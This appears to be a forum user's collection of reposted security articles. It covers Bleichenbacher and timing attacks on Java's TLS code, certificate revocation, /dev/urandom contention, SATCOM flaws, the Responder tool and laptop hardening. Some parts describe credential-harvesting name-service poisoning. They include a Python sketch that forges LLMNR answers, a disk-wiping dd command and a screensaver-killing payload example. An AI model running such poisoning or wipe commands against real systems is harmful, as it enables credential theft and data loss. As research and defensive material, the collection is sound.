Everything posted by Nytro
-
Digging Deep Into The Flash Sandboxes
Type: Video
Tags: Flash
Authors: Mark Vincent Yason, Paul Sabanal
Event: Black Hat USA 2012
Indexed on: Apr 17, 2014
URL: https://media.blackhat.com/us-12/video/us-12-Sabanal-Digging-Deep-Into-The-Flash-Sandboxes.mp4
File name: us-12-Sabanal-Digging-Deep-Into-The-Flash-Sandboxes.mp4
File size: 162.1 MB
MD5: 794e3c2b928a1135b2be260f59610bca
SHA1: b6ea828164ff98cb88fba008eff393ac18560071
-
Easter Hack: Even More Critical Bugs in SSL/TLS Implementations

It's been some time since my last blog post - time for writing is rare. But today, I'm very happy that Oracle released the brand new April Critical Patch Update, fixing 37 vulnerabilities in our beloved Java (seriously, no kidding - Java is simply a great language!). With that being said, all vulnerabilities reported by my colleagues (credits go to Juraj Somorovsky, Sebastian Schinzel, Erik Tews, Eugen Weiss, Tibor Jager and Jörg Schwenk) and me are fixed, and I highly recommend patching as soon as possible if you are running a server powered by JSSE! Additional results on crypto hardware suffering from vulnerable firmware are omitted for the moment because the patches aren't available yet - details will follow when the fixes are ready. To keep this blog post as short as possible I will skip a lot of details, analysis and prerequisites you need to know to understand the attacks mentioned in this post. If you are interested, use the link at the end of this post to get a much more detailed report.

Resurrecting Fixed Attacks

Do you remember Bleichenbacher's clever million-question attack on SSL from 1998? It was believed to be fixed with the following countermeasure specified in the TLS 1.0 RFC:

“The best way to avoid vulnerability to this attack is to treat incorrectly formatted messages in a manner indistinguishable from correctly formatted RSA blocks. Thus, when it receives an incorrectly formatted RSA block, a server should generate a random 48-byte value and proceed using it as the premaster secret. Thus, the server will act identically whether the received RSA block is correctly encoded or not.” – Source: RFC 2246

In simple words, the server is advised to create a random PreMasterSecret in case of problems during processing of the received, encrypted PreMasterSecret (structure violations, decryption errors, etc.). 
The server must continue the handshake with the randomly generated PreMasterSecret and perform all subsequent computations with this value. This leads to a fatal Alert when checking the Finished message (because of different key material at client- and server-side), but it does not allow the attacker to distinguish valid from invalid (PKCS#1 v1.5 compliant and non-compliant) ciphertexts. In theory, an attacker gains no additional information on the ciphertext if this countermeasure is applied (correctly). Guess what? The fix itself can introduce problems:

Different processing times caused by different code branches in the valid and invalid cases
What happens if we can trigger Exceptions in the code responsible for branching? If we could trigger different Exceptions, how would that influence the timing behaviour?

Let's have a look at the second case first, because it is the easiest one to explain if you are familiar with Bleichenbacher's attack:

Exploiting PKCS#1 Processing in JSSE

A coding error in com.sun.crypto.provider.TlsPrfGenerator (a missing array length check and incorrect decoding) could be used to force an ArrayIndexOutOfBoundsException during PKCS#1 processing. The Exception finally led to a general error in the JSSE stack, which is communicated to the client in the form of an INTERNAL_ERROR SSL/TLS alert message. What can we learn from this? The alert message is only sent if we are already inside the PKCS#1 decoding code blocks! With this side channel, Bleichenbacher's attack can be mounted again: an INTERNAL_ERROR alert message suggests a PKCS#1 structure that was recognized as such, but contained an error - any other alert message was caused by the different processing branch (the countermeasure against this attack). The side channel is only triggered if the ciphertext decrypts to a specific structure. This structure is shown below. 
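That structure is the PKCS#1 v1.5 block format: 00 02, at least eight nonzero padding bytes, a 00 separator, then the 48-byte PreMasterSecret. A rough validity check in Python, as a hypothetical illustration of the format (this is not JSSE's decoding code):

```python
def looks_like_pkcs1_v15(em: bytes, pms_len: int = 48) -> bool:
    """Rough check of an RSA-decrypted block against PKCS#1 v1.5 (block type 2)."""
    # layout: 0x00 0x02 || PS (>= 8 nonzero bytes) || 0x00 || PreMasterSecret
    if len(em) < 11 or em[0] != 0x00 or em[1] != 0x02:
        return False
    try:
        sep = em.index(0x00, 2)  # first zero byte after the padding string
    except ValueError:
        return False             # no separator at all
    return (sep - 2) >= 8 and len(em) - (sep + 1) == pms_len
```

Bleichenbacher's attack works precisely because the server leaks whether a chosen ciphertext decrypts to something a check like this would accept.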
If a 00 byte is contained in any of the red-marked positions, the side channel will help us to recognize these ciphertexts. We tested our resurrected Bleichenbacher attack and were able to get the decrypted PreMasterSecret back. This took about 5h and 460,000 queries to the target server for a 2048-bit key. Sounds like a lot? No problem... Using the newest, high-performance adaptation of the attack (many thanks to Graham Steel for the very helpful discussions!) required only about 73,710 queries on average for a 4096-bit RSA key! JSSE was successfully exploited a first time. But let's have a look at a much more complicated scenario: no obvious presence of a side channel at all. Maybe we can use the first case...

Secret-Dependent Processing Branches Lead to Timing Side Channels

Something conspicuous about the random PreMasterSecret generation (you remember, the Bleichenbacher countermeasure) was already obvious during the code analysis of JSSE for the previous attack: the random PreMasterSecret was only generated if problems occurred during PKCS#1 decoding. Otherwise, no random bytes were generated (sun.security.ssl.Handshaker.calculateMasterSecret(...)). The question is, how time consuming is the generation of a random PreMasterSecret? Well, it depends, and there is no definitive answer to this question. Measuring time for valid and invalid ciphertexts revealed blurred results. But at least, having different branches with different processing times introduces the chance of a timing side channel. This is why OpenSSL was independently patched during our research to guarantee equal processing times for both valid and invalid ciphertexts.

Risks of Modern Software Design

To make a long story short, it turned out that the timing side channel was caused not by the random number generation, but by the concept of creating and handling Exceptions. Throwing and catching Exceptions is a very expensive task in terms of processing time. 
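The expense of exceptions is easy to demonstrate in any managed language. A small Python sketch illustrating the effect (the real measurements here were against JSSE's Java code, not this toy):

```python
import time

def unpad(block: bytes) -> bytes:
    """Error path raises, as RSAPadding.unpadV15 throws on malformed padding."""
    if block[:2] != b"\x00\x02":
        raise ValueError("bad padding")
    return block[2:]

def time_path(block: bytes, tries: int = 20000) -> float:
    """Total time to run `tries` unpad attempts on the given block."""
    t0 = time.perf_counter()
    for _ in range(tries):
        try:
            unpad(block)
        except ValueError:
            pass
    return time.perf_counter() - t0

valid_t = time_path(b"\x00\x02" + b"\x2a" * 48)
invalid_t = time_path(b"\x00\x01" + b"\x2a" * 48)
# the raising path is typically measurably slower than the clean return
print(f"valid: {valid_t:.4f}s  invalid: {invalid_t:.4f}s")
```

The same asymmetry, repeated over many handshakes, is what makes the decoding branch distinguishable from the countermeasure branch.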
Unfortunately, the Java code responsible for PKCS#1 decoding (sun.security.rsa.RSAPadding.unpadV15(...)) was written with the best intentions from a developer's point of view. It throws Exceptions if errors occur during PKCS#1 decoding. Time measurements revealed significant differences in the response time of a server when confronted with valid/invalid PKCS#1 structures. These differences could even be measured in a live environment (a university network) with a lot of traffic and noise on the line. Again, how is this useful? It's always the same - once you know that the ciphertext reached the PKCS#1 decoding branch, you know it was recognized as PKCS#1, and that again represents a useful and valid side channel for Bleichenbacher's attack. The attack on an OpenJDK 1.6 powered server took about 19.5h and 18,600 oracle queries in our live setup! JSSE was hit a second time...

OAEP Comes To The Rescue

Some of you might say "Switch to OAEP and all of your problems are gone...". I agree, partly. OAEP will indeed fix a lot of security problems (but definitely not all!), but only if implemented correctly. Manger told us that implementing OAEP the wrong way could have disastrous results. While looking at the OAEP decoding code in sun.security.rsa.RSAPadding, it turned out that the code contained behaviour similar to the one described by Manger as problematic. This could have led to another side channel if SSL/TLS already offered OAEP support...

All the vulnerabilities mentioned in this post are fixed, but others are in line to follow... We submitted a research paper which will explain the vulnerabilities mentioned here in more depth, as well as the unpublished ones, so stay tuned - there's more to come. Many thanks to my fellow researchers Juraj Somorovsky, Sebastian Schinzel, Erik Tews, Eugen Weiss, Tibor Jager and Jörg Schwenk - our findings wouldn't have been possible without everyone's special contribution. 
It needs a skilled team to turn theoretical attacks into practice! A more detailed analysis of all vulnerabilities listed here, as well as a lot more on SSL/TLS security, can be found in my PhD thesis: 20 Years of SSL/TLS Research: An Analysis of the Internet's Security Foundation. Posted 3 days ago by Chris Meyer Sursa: Java Security and Related Topics: Easter Hack: Even More Critical Bugs in SSL/TLS Implementations
-
[h=3]No, don't enable revocation checking (19 Apr 2014)[/h] Revocation checking is in the news again because of a large number of revocations resulting from precautionary rotations for servers affected by the OpenSSL heartbeat bug. However, revocation checking is a complex topic and there's a fair amount of misinformation around. In short, it doesn't work and you are no more secure by switching it on. But let's quickly catch up on the background: Certificates bind a public key and an identity (commonly a DNS name) together. Because of the way the incentives work out, they are typically issued for a period of several years. But events occur and sometimes the binding between public key and name that the certificate asserts becomes invalid during that time. In the recent cases, people who ran a server that was affected by the heartbeat bug are worried that their private key might have been obtained by someone else and so they want to invalidate the old binding, and bind to a new public key. However, the old certificates are still valid and so someone who had obtained that private key could still use them. Revocation is the process of invalidating a certificate before its expiry date. All certificates include a statement that essentially says “please phone the following number to check that this certificate has not been revoked”. The term online revocation checking refers to the process of making that phone call. It's not actually a phone call, of course, rather browsers and other clients can use a protocol called OCSP to check the status of a certificate. OCSP supplies a signed statement that says that the certificate is still valid (or not) and, critically, the OCSP statement itself is valid for a much shorter period of time, typically a few days. The critical question is what to do in the event that you can't get an answer about a certificate's revocation status. If you reject certificates when you can't get an answer, that's called hard-fail. 
If you accept certificates when you can't get an answer that's called soft-fail. Everyone does soft-fail for a number of reasons on top of the general principle that single points of failure should be avoided. Firstly, the Internet is a noisy place and sometimes you can't get through to OCSP servers for some reason. If you fail in those cases then the level of random errors increases. Also, captive portals (e.g. hotel WiFi networks where you have to “login” before you can use the Internet) frequently use HTTPS (and thus require certificates) but don't allow you to access OCSP servers. Lastly, if everyone did hard-fail then taking down an OCSP service would be sufficient to take down lots of Internet sites. That would mean that DDoS attackers would turn their attention to them, greatly increasing the costs of running them and it's unclear whether the CAs (who pay those costs) could afford it. (And the disruption is likely to be significant while they figure that out.) So soft-fail is the only viable answer but it has a problem: it's completely useless. But that's not immediately obvious so we have to consider a few cases: If you're worried about an attacker using a revoked certificate then the attacker first must be able to intercept your traffic to the site in question. (If they can't even intercept the traffic then you didn't need any authentication to protect it from them in the first place.) Most of the time, such an attacker is near you. For example, they might be running a fake WiFi access point, or maybe they're at an ISP. In these cases the important fact is that the attacker can intercept all your traffic, including OCSP traffic. Thus they can block OCSP lookups and soft-fail behaviour means that a revoked certificate will be accepted. The next class of attacker might be a state-level attacker. For example, Syria trying to intercept Facebook connections. 
These attackers might not be physically close, but they can still intercept all your traffic because they control the cables going into and out of a country. Thus, the same reasoning applies. We're left with cases where the attacker can only intercept traffic between a user and a website, but not between the user and the OCSP service. The attacker could be close to the website's servers and thus able to intercept all traffic to that site, but not anything else. More likely, the attacker might be able to perform a DNS hijacking: they persuade a DNS registrar to change the mapping between a domain (example.com) and its IP address(es) and thus direct the site's traffic to themselves. In these cases, soft-fail still doesn't work, although the reasoning is more complex: Firstly, the attacker can use OCSP stapling to include the OCSP response with the revoked certificate. Because OCSP responses are generally valid for some number of days, they can store one from before the certificate was revoked and use it for as long as it's valid for. DNS hijackings are generally noticed and corrected faster than the OCSP response will expire. (On top of that, you need to worry about browser cache poisoning, but I'm not going to get into that.) Secondly, and more fundamentally, when issuing certificates a CA validates ownership of a domain by sending an email, or looking for a specially formed page on the site. If the attacker is controlling the site, they can get new certificates issued. The original owners might revoke the certificates that they know about, but it doesn't matter because the attacker is using different ones. The true owners could try contacting CAs, convincing them that they are the true owners and get other certificates revoked, but if the attacker still has control of the site, they can hop from CA to CA getting certificates. (And they will have the full OCSP validity period to use after each revocation.) That circus could go on for weeks and weeks. 
That's why I claim that online revocation checking is useless - because it doesn't stop attacks. Turning it on does nothing but slow things down. You can tell when something is security theater because you need some absurdly specific situation in order for it to be useful. So, for a couple of years now, Chrome hasn't done these useless checks by default in most cases. Rather, we have tried a different mechanism. We compile daily lists of some high-value revocations and use Chrome's auto-update mechanism to push them to Chrome installations. It's called the CRLSet and it's not complete, nor big enough to cope with large numbers of revocations, but it allows us to react quickly to situations like Diginotar and ANSSI. It's certainly not perfect, but it's more than many other browsers do. A powerful attacker may be able to block a user from receiving CRLSet updates if they can intercept all of that user's traffic for long periods of time. But that's a pretty fundamental limit; we can only respond to any Chrome issue, including security bugs, by pushing updates. The original hope with CRLSets was that we could get revocations categorised into important and administrative and push only the important ones. (Administrative revocations occur when a certificate is changed with no reason to suspect that any key compromise occurred.) Sadly, that mostly hasn't happened. Perhaps we need to consider a system that can handle much larger numbers of revocations, but the data in that case is likely to be two orders of magnitude larger and it's very unlikely that the current CRLSet design is still optimal when the goal moves that far. It's also a lot of data for every user to be downloading and perhaps efforts would be better spent elsewhere. It's still the case that an attacker that can intercept traffic can easily perform an SSL Stripping attack on most sites; they hardly need to fight revoked certificates. 
In order to end on a positive note, I'll mention a case where online revocation checking does work, and another, possible way to solve the revocation problem for browsers. The arguments above started with the point that an attacker using a revoked certificate first needs to be able to intercept traffic between the victim and the site. That's true for browsers, but it's not true for code-signing. In the case where you're checking the signature on a program or document that could be distributed via, say, email, then soft-fail is still valuable. That's because it increases the costs on the attacker substantially: they need to go from being able to email you to needing to be able to intercept OCSP checks. In these cases, online revocation checking makes sense. If we want a scalable solution to the revocation problem then it's probably going to come in the form of short-lived certificates or something like OCSP Must Staple. Recall that the original problem stems from the fact that certificates are valid for years. If they were only valid for days then revocation would take care of itself. (This is the approach taken by DNSSEC.) For complex reasons, it might be easier to deploy that by having certificates that are valid for years, but include a marker in them that indicates that an OCSP response must be provided along with the certificate. The OCSP response is then only valid for a few days and the effect is the same (although less efficient). Sursa: https://www.imperialviolet.org/2014/04/19/revchecking.html
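The hard-fail/soft-fail distinction the whole argument rests on can be stated in a few lines of Python (a schematic sketch with invented names, not any browser's actual logic):

```python
from enum import Enum

class OCSPStatus(Enum):
    GOOD = "good"
    REVOKED = "revoked"
    UNAVAILABLE = "unavailable"  # lookup blocked, timed out, captive portal...

def accept_certificate(status: OCSPStatus, hard_fail: bool) -> bool:
    """Decide whether to proceed with a certificate given an OCSP lookup result."""
    if status is OCSPStatus.REVOKED:
        return False
    if status is OCSPStatus.UNAVAILABLE:
        # soft-fail accepts when no answer arrives; hard-fail rejects
        return not hard_fail
    return True
```

An attacker who can intercept your traffic can always force the UNAVAILABLE branch by blocking the OCSP lookup, which is exactly why soft-fail checking buys nothing against such an attacker.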
-
Linux /dev/urandom and concurrency

Recently I was surprised to find out that a process that I expected to complete in about 8 hours was still running after 20. Everything appeared to be operating normally. The load on the server was what we expected, IO was minimal, and the external services it was using were responding with normal latencies. After tracing one of the sub-processes we noticed that reads from /dev/urandom were not what we expected. It was taking 80-200ms to read 4k from this device. At first I thought that this was an issue with entropy, but /dev/urandom is non-blocking, so that probably wasn't the issue. I didn't think that 80-200ms was typical, so I tried a dd on the system in question and on another similar system in production. The system in question took about 3 minutes to write 10 MB while the reference system took about 3s. The only difference between the systems with respect to /dev/urandom was the rate and number of processes reading from the device. The reads were on the order of hundreds per second. The number of processes reading from /dev/urandom made me wonder if maybe there was a spinlock in the kernel in the read code. After looking at the code I found one. You can see the spinlock here in the Linux kernel source code. The author mentions the potential for contention in a thread on the mailing list from December 2004. Fast forward 10 years and contention on this device is a real issue. Our application uses curl from within PHP to fetch data from a cache. The application has to process tens of millions of text objects and we don't want to wait days for that processing to complete, so we split the work of processing each object over N threads. The read from /dev/urandom appears to be coming from ares_init, which is being called from curl_easy_init in our version of PHP+curl. Removing the AsynchDNS feature from curl causes the problem to go away (tracing confirms that the read from /dev/urandom is no longer there). 
You can remove this feature by compiling with --disable-ares. So why is this an issue? I wrote a python script to measure the read times from /dev/urandom as you increase the contention by adding more threads. Here is a plot with the results. Running the same script with a user-land file is more or less linear out to 16 threads. A simple spinlock can have a big impact in the multi-core world of 2014! Sursa: Linux /dev/urandom and concurrency
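The measurement script itself isn't included in the post; a minimal Python reconstruction (my sketch, not the author's code) that times 4 KB reads from /dev/urandom as the thread count grows might look like:

```python
import threading
import time

def mean_read_latency(n_threads, reads=100, chunk=4096, path="/dev/urandom"):
    """Average seconds per read of `chunk` bytes with n_threads concurrent readers."""
    samples = []
    lock = threading.Lock()

    def worker():
        local = []
        # unbuffered, so every read() hits the device (and its kernel lock)
        with open(path, "rb", buffering=0) as f:
            for _ in range(reads):
                t0 = time.perf_counter()
                f.read(chunk)
                local.append(time.perf_counter() - t0)
        with lock:
            samples.extend(local)

    threads = [threading.Thread(target=worker) for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(samples) / len(samples)

if __name__ == "__main__":
    for n in (1, 2, 4, 8, 16):
        print(f"{n:2d} threads: {mean_read_latency(n) * 1e6:9.1f} us/read")
```

On a 2014-era kernel this should reproduce the growth the author describes, while pointing `path` at a regular user-land file should stay roughly flat.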
-
[h=3]A Wake-up Call for SATCOM Security[/h] By Ruben Santamarta @reversemode

During the last few months we have witnessed a series of events that will probably be seen as a tipping point in the public’s opinion about the importance of, and need for, security. The revelations of Edward Snowden have served to confirm some theories and shed light on surveillance technologies that were long restricted. We live in a world where an ever-increasing stream of digital data is flowing between continents. It is clear that those who control communications traffic have the upper hand. Satellite Communications (SATCOM) play a vital role in the global telecommunications system. Sectors that commonly rely on satellite networks include:

Aerospace
Maritime
Military and governments
Emergency services
Industrial (oil rigs, gas, electricity)
Media

It is important to mention that certain international safety regulations, such as GMDSS for ships or ACARS for aircraft, rely on satellite communication links. In fact, we recently read how, thanks to the SATCOM equipment on board Malaysian Airlines MH370, Inmarsat engineers were able to determine the approximate position where the plane crashed. IOActive is committed to improving overall security. The only way to do so is to analyze the security posture of the entire supply chain, from the silicon level to the upper layers of software. Thus, in the last quarter of 2013 I decided to research a series of devices that, although widely deployed, had not received the attention they actually deserve. The goal was to provide an initial evaluation of the security posture of the most widely deployed Inmarsat and Iridium SATCOM terminals. In previous blog posts I've explained the common approach when researching complex devices that are not physically accessible. In these terms, this research is not much different from the previous research: in most cases the analysis was performed by reverse engineering the firmware statically. 
What about the results? Insecure and undocumented protocols, backdoors, hard-coded credentials... mainly design flaws that allow remote attackers to fully compromise the affected devices using multiple attack vectors. Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oil rigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be affected by these vulnerabilities. I hope this research is seen as a wake-up call for both the vendors and users of the current generation of SATCOM technology. We will be releasing full technical details in several months, at Las Vegas, so stay tuned. The following white paper comprehensively explains all the aspects of this research: http://www.ioactive.com/pdfs/IOActive_SATCOM_Security_WhitePaper.pdf Sursa: IOActive Labs Research: A Wake-up Call for SATCOM Security
-
NBT-NS/LLMNR Responder
Laurent Gaffie lgaffie@trustwave.com
http://www.spiderlabs.com

INTRODUCTION

This tool is first an LLMNR, NBT-NS and MDNS responder. It will answer specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool only answers File Server Service requests, which is for SMB. The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option to "On" via the command line if you want this tool to answer to the Workstation Service request name suffix.

FEATURES

Built-in SMB Auth server. Supports NTLMv1 and NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text passwords are supported for NT4, and LM hashing downgrade when the --lm option is set to On. This functionality is enabled by default when the tool is launched.

Built-in MSSQL Auth server. In order to redirect SQL Authentication to this tool, you will need to set the option -r to On (NBT-NS queries for SQL Server lookup use the Workstation Service name suffix) for systems older than Windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1 and LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008.

Built-in HTTP Auth server. In order to redirect HTTP Authentication to this tool, you will need to set the option -r to On for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome and Safari. Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). 
You can now send your custom files to a victim.

Built-in HTTPS Auth server. In order to redirect HTTPS Authentication to this tool, you will need to set the -r option to On for Windows versions older than Vista (NBT-NS queries for HTTP server lookups are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2, and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, and Safari. The folder Cert/ was added and contains two default keys, including a dummy private key. This is intentional; the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self-signed key pair.

Built-in LDAP Auth server. In order to redirect LDAP Authentication to this tool, you will need to set the option -r to On for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on the Windows Support tool "ldp" and LdapAdmin.

Built-in FTP Auth server. This module will collect FTP clear text credentials.

Built-in small DNS server. This server will answer type A queries. This is really handy when it's combined with ARP spoofing.

All hashes are printed to stdout and dumped into a unique, John the Ripper (Jumbo) compliant file, using this format: (SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt The file will be located in the current folder.

Responder will log all its activity to the file Responder-Session.log.

When the option -f is set to "On", Responder will fingerprint every host that issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode.

Browser Listener finds the PDC in stealth mode.

ICMP Redirect for MITM on Windows XP/2003 and earlier Domain members. 
This attack combined with the DNS module is pretty effective.

WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is highly effective. You can now send your custom PAC script to a victim and inject HTML into the server's responses. See Responder.conf. This module is now enabled by default.

Analyze mode: This module allows you to see NBT-NS, BROWSER and LLMNR requests from which workstation to which workstation without poisoning any requests. You can also map domains, MSSQL servers and workstations passively, and see if ICMP Redirect attacks are plausible on your subnet.

Responder is now using a configuration file. See Responder.conf.

Built-in POP3 auth server. This module will collect POP3 plaintext credentials.

Built-in SMTP auth server. This module will collect PLAIN/LOGIN clear text credentials.

Download: https://github.com/SpiderLabs/Responder/
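To make the poisoning concrete, here is a schematic Python sketch of what answering an LLMNR query involves at the packet level (an illustration of the message format only, not Responder's actual code):

```python
import socket
import struct

def parse_llmnr_query(data: bytes):
    """Extract (transaction id, encoded name, qtype, qclass) from an LLMNR query."""
    txid = data[:2]
    off = 12                      # fixed 12-byte DNS-style header
    while data[off] != 0:         # walk the length-prefixed name labels
        off += 1 + data[off]
    off += 1                      # include the terminating zero byte
    name = data[12:off]
    qtype, qclass = struct.unpack(">HH", data[off:off + 4])
    return txid, name, qtype, qclass

def build_llmnr_answer(query: bytes, spoof_ip: str) -> bytes:
    """Craft a poisoned A-record response claiming spoof_ip for whatever was asked."""
    txid, name, qtype, qclass = parse_llmnr_query(query)
    # QR=1 (response), 1 question, 1 answer record
    header = txid + struct.pack(">HHHHH", 0x8000, 1, 1, 0, 0)
    question = name + struct.pack(">HH", qtype, qclass)
    # answer RR: name, type A, class IN, TTL 30s, 4-byte address
    answer = name + struct.pack(">HHIH", 1, 1, 30, 4) + socket.inet_aton(spoof_ip)
    return header + question + answer
```

A real responder binds a UDP socket on port 5355, joins the LLMNR multicast group 224.0.0.252, and sends the crafted answer back to whichever host asked.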
-
Paranoid security lockdown of laptop

What I want to achieve is:

Minimize damage done if laptop is stolen
Minimize damage done if laptop is tampered with while away from it
Minimize chance of being compromised while system is running
Maximize chance of detection if system is compromised
Maximize anonymity on the internet

Security is a tradeoff between usability and risk. This document is for those willing to sacrifice some usability. I suspect the contents of this text will become increasingly valuable as time goes on.

Full disk encryption

Disk encryption ensures that files are always stored on disk in an encrypted form. The files only become available to the operating system and applications in readable form while the system is running and unlocked by a trusted user. An unauthorized person looking at the disk contents directly will only find garbled, random-looking data instead of the actual files. For example, this can prevent unauthorized viewing of the data when the computer or hard disk is:

located in a place to which non-trusted people might gain access while you're away
lost or stolen, as with laptops, netbooks or external storage devices
in the repair shop
discarded after its end-of-life

In addition, disk encryption can also be used to add some security against unauthorized attempts to tamper with your operating system - for example, the installation of keyloggers or Trojan horses by attackers who can gain physical access to the system while you're away.

Preparation

Fill the drive with random data to prevent recovery of previously stored data. It also prevents detection of usage patterns on the drive. 
dd if=/dev/urandom of=/dev/sda bs=1M

Full disk encryption using dm-crypt + LUKS

cryptsetup --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 5000 --use-random --verify-passphrase luksFormat /dev/sda2
cryptsetup luksOpen /dev/sda2 root
mkfs.ext4 /dev/mapper/root
mount /dev/mapper/root /mnt
mkdir /mnt/boot
mount /dev/sda1 /mnt/boot

Edit /etc/mkinitcpio.conf and add the encrypt and shutdown hooks to HOOKS. Place the encrypt hook directly before the filesystems hook. Add dm_mod and ext4 to MODULES. Edit /etc/default/grub and add GRUB_CMDLINE_LINUX="cryptdevice=/dev/sda2:root"

Swap space

No. Instead buy enough RAM.

BIOS

Set a BIOS password. This prevents cold boot attacks where RAM is immediately dumped after a reboot. It has been shown that data in RAM persists for a few seconds after powering down.

USB attacks

When a USB device is inserted, the USB driver in the kernel is invoked. If a bug is discovered here it may lead to code running:

system("killall gnome-screensaver")

Or it may slurp up all the memory and cause the Linux out-of-memory killer to kill the screensaver process. USB driver loading can be disabled in the BIOS. Or you can:

echo 'install usb-storage : ' >> /etc/modprobe.conf

USB automounting attacks

You lesser beings willing to allow the USB driver to load should at least disable automounting. Allowing filesystems to automount causes even more potentially vulnerable code to run. For example, Ubuntu once opened the file explorer and showed thumbnails of images. One researcher was able to find a bug in an image library used to produce thumbnails. He just inserted a USB drive and the exploit killed the screensaver.

Screensaver

Set a screensaver with password lock to kick in after one minute. Create a keyboard shortcut to lock the screen and manually lock when temporarily leaving the system. Power down for longer absences.

File integrity

To detect compromised files, file integrity tools can store hashsums of them and let you know if they suddenly change. 
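At its core such a tool just records digests on a known-clean system and re-checks them later. A toy Python version to show the idea (an illustration only; use AIDE or similar in practice):

```python
import hashlib
import json
import os

def hash_tree(root):
    """Map every file under root to its SHA-256 digest."""
    sums = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            sums[path] = h.hexdigest()
    return sums

def init_db(root, db):
    """Record the current state (run this on a known-clean system)."""
    with open(db, "w") as f:
        json.dump(hash_tree(root), f)

def check(root, db):
    """Return paths added, removed or modified since init_db."""
    with open(db) as f:
        old = json.load(f)
    new = hash_tree(root)
    return sorted(p for p in old.keys() | new.keys() if old.get(p) != new.get(p))
```

Keeping the database (or a printout of it) offline is what protects the baseline from the same malware it is meant to detect.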
Obviously, malware can also modify the hashsums. But it helps in cases where the malware does not. For the extra cautious, you could store the file integrity hashsums offline or print them out.

AIDE (Advanced Intrusion Detection Environment)

aide -i
mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz
aide -C

rkhunter

Rootkit Hunter additionally scans the system for rootkits. On a clean system, update the system properties:

rkhunter --propupd
rkhunter --check --rwo -sk

There probably are a few false positives. Edit /etc/rkhunter.conf.local and add exceptions for them. Here is my crontab for these two programs:

MAILTO=me@dvikan.no
MAILFROM=me@dvikan.no
30 06 * * 1 /usr/bin/rkhunter --cronjob --rwo
35 06 * * 1 /usr/bin/aide -C

Network

VPN

Use a trusted VPN so that your ISP is unable to see your traffic. www.ipredator.se To prevent traffic from accidentally flowing via the real physical network interface, you should only allow outgoing traffic to be UDP on port 1194. For DNS and DHCP, outgoing ports 53, 67, and 68 must also be allowed.

Simple stateful firewall

Drop everything in INPUT. Then allow already existing connections. Also allow everything to the loopback interface.

iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 53 -j ACCEPT
iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 1194 -j ACCEPT
iptables -A OUTPUT -o tun0 -j ACCEPT
iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 67:68 -j ACCEPT

Save the rules into a file and have it loaded on boot:

iptables-save > /etc/iptables/iptables.rules
systemctl enable iptables

If your VPN does not support IPv6, then drop all outgoing traffic on IPv6:

ip6tables -P OUTPUT DROP

And add ipv6.disable=1 to the kernel line to prevent loading of the IPv6 module.

DNS

Do not use your ISP's DNS server, unless you want them to see the domains you are visiting. 
https://www.ipredator.se/page/services#service_dns

Put this in /etc/resolv.conf:

nameserver 194.132.32.32
nameserver 46.246.46.246

Preserve the DNS settings by adding the following to /etc/dhcpcd.conf:

nohook resolv.conf

MAC address

To randomize the MAC address while keeping the vendor prefix:

macchanger -e interface

To set a random MAC address after boot, here is an example systemd service; put it in /etc/systemd/system/macchanger@.service (note that systemd section names are case sensitive):

[Unit]
Description=Macchanger service for %I
Documentation=man:macchanger(1)

[Service]
ExecStart=/usr/bin/macchanger -e %I
Type=oneshot

[Install]
WantedBy=multi-user.target

Then enable it:

systemctl enable macchanger@enp2s0

Firefox

Sandbox

Sandfox runs programs within sandboxes which limit the programs' access to only the files you specify. Why run Firefox and other programs in a sandbox? In the Firefox case there are many components running: Java, JavaScript, Flash and third-party plugins. All of these can open vulnerabilities due to bugs and malicious code; under certain circumstances these components can run anything on your computer and can access, modify, and delete your files. It is nice to know that when such vulnerabilities are exploited, these components can only see and access a limited subset of your files.

Create a sandbox with sandfox:

sudo sandfox firefox

Do not install Flash or Java. Disable WebRTC to prevent local IP discovery. For registration forms, use a pseudorandom identity and a throwaway email address. Make Firefox prefer cipher suites providing forward secrecy.

Extensions

noscript
https everywhere

Email

Many SMTP and IMAP servers use TLS. Not all do. Email is decrypted at each node. End-to-end encryption makes email secure. The most widely used standard for encrypting files is the OpenPGP standard. GnuPG is a free implementation of it.
A short usage summary:

gpg --gen-key                                        # generate keypair
gpg --detach-sign --armour file.txt                  # signature
gpg -r 7A2B13CD --armour --sign --encrypt file.txt   # signature and encryption

TLS gotchas

